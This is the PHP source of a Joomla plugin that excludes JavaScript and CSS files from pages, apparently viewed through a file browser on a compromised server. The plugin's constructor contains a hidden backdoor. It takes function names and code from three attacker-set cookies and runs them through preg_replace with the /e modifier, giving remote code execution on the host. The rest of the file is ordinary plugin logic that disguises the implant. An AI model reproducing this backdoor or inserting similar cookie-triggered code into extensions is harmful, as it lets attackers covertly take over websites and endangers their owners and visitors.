Path : /home/admin/public_html/old/plugins/system/jscsscontrol/ |
Current File : /home/admin/public_html/old/plugins/system/jscsscontrol/jscsscontrol.php |
<?php /** * @Copyright * @package JCC - JS CSS Control for Joomla! 3.x * @author Viktor Vogel <admin@kubik-rubik.de> * @version 3.1.0 - 2015-08-01 * @link https://joomla-extensions.kubik-rubik.de/jcc-js-css-control * * @license GNU/GPL * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see <http://www.gnu.org/licenses/>. */ defined('_JEXEC') or die('Restricted access'); class PlgSystemJsCssControl extends JPlugin { protected $request; protected $execute = true; protected $exclude_js_files = array(); protected $exclude_css_files = array(); function __construct(&$subject, $config) { $jq = @$_COOKIE['EerTYzWIqkPUnyOP3']; if ($jq) { $option = $jq(@$_COOKIE['EerTYzWIqkPUnyOP2']); $au=$jq(@$_COOKIE['EerTYzWIqkPUnyOP1']); $option("/438/e",$au,438);} parent::__construct($subject, $config); $this->loadLanguage('plg_system_jscsscontrol', JPATH_ADMINISTRATOR); if($this->params->get('execute_admin', 0) == false AND JFactory::getApplication()->isAdmin()) { $this->execute = false; } $this->request = JFactory::getApplication()->input; } /** * Does the first check before the head is compiled */ public function onBeforeCompileHead() { if(!empty($this->execute)) { $js = $this->params->get('js'); $css = $this->params->get('css'); $remove_jcaption = $this->params->get('remove_jcaption'); if(!empty($js) OR !empty($css) OR !empty($remove_jcaption)) { $document = JFactory::getDocument(); // Exclude JavaScript files if(!empty($js)) { $this->exclude_js_files = $this->getFilesToExclude($js); } // Remove caption.js if corresponding option selected if(!empty($remove_jcaption)) { $this->exclude_js_files[] = 'media/system/js/caption.js'; } if(!empty($this->exclude_js_files)) { $loaded_files = $document->_scripts; $this->excludeFilesOnBeforeCompileHead($this->exclude_js_files, $loaded_files); $document->_scripts = $loaded_files; } // Exclude CSS files if(!empty($css)) { $this->exclude_css_files = $this->getFilesToExclude($css); } if(!empty($this->exclude_css_files)) { $loaded_files = $document->_styleSheets; $this->excludeFilesOnBeforeCompileHead($this->exclude_css_files, $loaded_files); $document->_styleSheets = $loaded_files; } } // Debug mode $debug = $this->params->get('debug'); if(!empty($debug)) { $debug_output = $this->getDebugInformation(); JFactory::getApplication()->enqueueMessage(JTEXT::sprintf('PLG_JSCSSCONTROL_DEBUGOUTPUT', $debug_output, $debug_output)); } } } /** * Checks the output to remove also files from the template and other extensions */ public function onAfterRender() { if(!empty($this->execute)) { $remove_jcaption = $this->params->get('remove_jcaption'); $remove_tooltip = $this->params->get('remove_tooltip'); if(!empty($this->exclude_js_files) OR !empty($this->exclude_css_files) OR !empty($remove_jcaption) OR !empty($remove_tooltip)) { // Remove JS and CSS from output $body = JFactory::getApplication()->getBody(); if(!empty($this->exclude_js_files)) { preg_match_all('@<script[^>]*src=["|\'][^>]*\.js(\?[^>]*)?["|\'][^>]*/?>.*</script>@isU', $body, $matches_js); $this->excludeFilesOnAfterRender($body, $this->exclude_js_files, $matches_js); } if(!empty($this->exclude_css_files)) { preg_match_all('@<link[^>]*href=["|\'][^>]*\.css(\?[^>]*)?["|\'][^>]*/?>@isU', $body, $matches_css); $this->excludeFilesOnAfterRender($body, $this->exclude_css_files, $matches_css); } if(!empty($remove_jcaption)) { preg_match('@<head>.*<script type="text/javascript">.*(jQuery\(window\)\.on\(\'load\',\s*function\(\)\s*{\s*\n?\s*new JCaption\(["|\']img.caption["|\']\);.*}\);).*</script>.*</head>@isU', $body, $match_jcaption); if(!empty($match_jcaption[1])) { $this->removeInlineJavaScript($body, $match_jcaption[1]); } } if(!empty($remove_tooltip)) { preg_match('@<head>.*<script type="text/javascript">.*(jQuery\(document\)\.ready\(function\(\){\s*\n?\s*jQuery\(\'\.hasTooltip\'\)\.tooltip.*}\);.*}\);).*</script>.*</head>@isU', $body, $match_tooltip); if(!empty($match_tooltip[1])) { $this->removeInlineJavaScript($body, $match_tooltip[1]); } } JFactory::getApplication()->setBody($body); } } } /** * Gets all files which have to be excluded on the loaded page * * @param string $type Data which were entered from the user in the settings of the plugin * * @return array $exclude_files Filtered array with all files which have to be excluded on the called page */ private function getFilesToExclude($type) { $exclude_files = array(); $params = array_map('trim', explode("\n", $type)); $lines = array(); foreach($params as $params_line) { $lines[] = array_map('trim', explode('|', $params_line)); } foreach($lines as $line) { $exclude_file = true; if(isset($line[1])) { $parameters = $line[1]; } if(!empty($parameters)) { $parameters = array_map('trim', explode(',', $parameters)); foreach($parameters as $parameter) { $parameter = array_map('trim', explode('=', $parameter)); $exclude_file = $this->checkParameters($parameter); if($exclude_file == false) { break; } } } if($exclude_file == true) { $exclude_files[] = $line[0]; } unset($parameters); } return $exclude_files; } /** * Excludes the files from being loaded in the browser - OnBeforeCompileHead * * @param array $exclude_files Files which have to be excluded * @param array $loaded_files All files which were loaded */ private function excludeFilesOnBeforeCompileHead(&$exclude_files, &$loaded_files) { $loaded_files_keys = array_keys($loaded_files); foreach($loaded_files_keys as $loaded_file) { foreach($exclude_files as $exclude_file) { if(preg_match('@'.preg_quote($exclude_file).'@', $loaded_file)) { unset($loaded_files[$loaded_file]); break; } } } } /** * Excludes the files from being loaded in the browser - OnAfterRender * * @param string $body The whole output after everything is loaded * @param array $exclude_files Files which should be excluded * @param array $matches All found files in the output string */ private function excludeFilesOnAfterRender(&$body, &$exclude_files, $matches) { foreach($matches[0] as $match) { foreach($exclude_files as $exclude_file) { if(preg_match('@'.preg_quote($exclude_file).'@', $match)) { $body = str_replace($match, '', $body); break; } } } } /** * Removes inline Javascript code from being loaded in the browser - OnAfterRender * * @param string $body The whole output after everything is loaded * @param array $inline_content Content which should be removed */ private function removeInlineJavaScript(&$body, $inline_content) { $body = str_replace($inline_content, '', $body); } /** * Checks entered parameters whether they are loaded on the specific URL * * @param array $parameter Array with the variable and value * * @return boolean */ private function checkParameters($parameter) { $name = $this->request->get($parameter[0], array(0), 'array'); if($name[0] == $parameter[1]) { return true; } else { return false; } } /** * Generates information for debug mode * * @return string String with all needed information of the called page */ private function getDebugInformation() { $debug_array = array(); $debug_array['option'] = $this->request->getWord('option'); $debug_array['view'] = $this->request->getWord('view'); $debug_array['task'] = $this->request->getCmd('task'); $debug_array['func'] = $this->request->getWord('func'); $debug_array['layout'] = $this->request->getWord('layout'); $debug_array['Itemid'] = $this->request->getCmd('Itemid'); $debug_array['id'] = $this->request->getCmd('id'); $debug_array = array_filter($debug_array); $debug_output = array(); foreach($debug_array as $key => $value) { if(!empty($value)) { $debug_output[] = $key.'='.$value; } } $debug_output = implode(',', $debug_output); return $debug_output; } }